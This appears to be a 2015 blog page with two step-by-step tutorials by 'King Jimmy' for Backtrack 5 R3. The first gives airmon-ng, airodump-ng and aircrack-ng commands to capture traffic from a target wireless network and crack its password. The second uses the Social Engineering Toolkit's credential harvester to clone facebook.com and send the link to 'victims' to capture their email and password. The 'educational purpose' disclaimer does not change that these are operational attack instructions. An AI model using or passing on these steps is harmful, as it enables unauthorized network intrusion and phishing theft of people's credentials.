Monday, March 16, 2015

Backtrack 5 R3 Tutorial of Hacking WLAN password By King Jimmy



            Backtrack 5 R3 Tutorial of Hacking WLAN password By King Jimmy

  1. In Backtrack, Open new terminal and type "ifconfig". (You will get the network interfaces there. And check whether the wlan is there. Example, "wlan0")
  2. Than type "ifconfig wlan0 up". There might be different name in network interface.
  3. After wlan0 is up, enter "airmon-ng start wlan0". (This will enable monitor mode. Also it will display the name. Example, mon1 or mon2 etc.)
  4. Than enter "airodump-ng mon2". ("mon2" could be different in yours.)
    Wait until you get the information of wlan networks. And press Ctrl+c on your keyboard.
  5. Than in same terminal type " airodump-ng mon2 --bssid 00:30:4F:8D:4C:66 -c 1 -w anYtube". (Bssid and channel might be not same. You will get bssid and channel in step 4, enter that bssid  and channel when you doing this. I got "00:30:4F:8D:4C:66" as bssid and "1" as channel. So you have to enter your target network's bssid and channel.)
  6. When you done step 5 correctly it will start collecting packets. Wait until the data reaches 20000 and press Ctrl+c. (Now the data file is saved on home folder)
  7. In terminal type "aircrack-ng anYtube-01.cap" and hit enter. This take a while...
Now you should get the wlan password. Example, (ASCII: 12345)
Finally you got the password!
=This is for educational purpose. Do not use illegally.=

Thank You For Spending Your Valuable Time Surfing My Website.

How to HACK Facebook Password (Backtrack 5 R3) By King Jimmy


           How to HACK Facebook Password [Backtrack 5 R3] By King Jimmy


  1. Open Backtrack 5 R3
  2. Than go to, Application > BackTrack > Exploitation Tools > Social Engineering Tools > Social Engineering Toolkit > Set. (This will open Terminal)
  3. From the menu select option 1) Social-Engineering Attacks
    From next menu select option 2) Website Attack Vectors
    Than select option 3) Credential Harvester Attack Method
    At least select option 2) Site Cloner
    (Than keep this terminal and open new terminal)
  4. In new terminal type "ifconfig" and press enter. You will get the your IP address. (Most probably it is like this : inet addr : 192.168.20.129 )
  5. Copy and paste the IP address to first terminal and hit enter.
  6. Now you need enter website URL to clone. So just enter "www.facebook.com"
  7. Than wait until website was cloned. After finish cloning press enter when terminal displays "Press <return> to continue".
Finally you to send the IP you have used to your victims. After victim login through the IP you will get victim's email and password. And it is displayed in terminal.
=This is for educational purpose. Do not use illegally.=

Thank you for spending your valuable time surfing My Website.